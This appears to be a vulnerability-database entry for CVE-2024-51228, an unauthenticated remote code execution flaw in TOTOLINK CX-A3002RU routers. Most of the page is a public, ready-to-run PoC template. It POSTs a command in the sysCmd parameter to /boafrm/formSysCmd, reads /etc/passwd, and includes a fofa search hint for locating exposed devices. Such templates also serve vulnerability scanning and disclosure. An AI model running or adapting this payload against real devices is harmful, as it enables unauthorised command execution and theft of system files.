CVE-2024-51228: TOTOLINK CX-A3002RU RCE

日期: 2025-09-01 | 影响软件: TOTOLINK CX A3002RU | POC: 已公开

漏洞描述

A remote code execution vulnerability exists in TOTOLINK CX-A3002RU devices via formSysCmd. The vulnerability allows an unauthenticated attacker to execute arbitrary system commands through URL-encoded sysCmd parameter. fofa: TOTOLINK

PoC代码[已公开]

id: CVE-2024-51228
info:
  name: TOTOLINK CX-A3002RU RCE
  author: ZacharyZcR
  severity: critical
  verified: true
  description: |
    A remote code execution vulnerability exists in TOTOLINK CX-A3002RU devices via formSysCmd.
    The vulnerability allows an unauthenticated attacker to execute arbitrary system commands through URL-encoded sysCmd parameter.
    fofa: TOTOLINK
  reference:
    - https://xz.aliyun.com/t/16707
  tags: cve,cve2024,iot,rce,totolink
  created: 2024/12/31

rules:
  r0:
    request:
      method: POST
      path: /boafrm/formSysCmd
      body: sysCmd=cat+/etc/passwd&apply=Apply&submit-url=/syscmd.htm&msg=
    expression: |
      "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()

相关漏洞推荐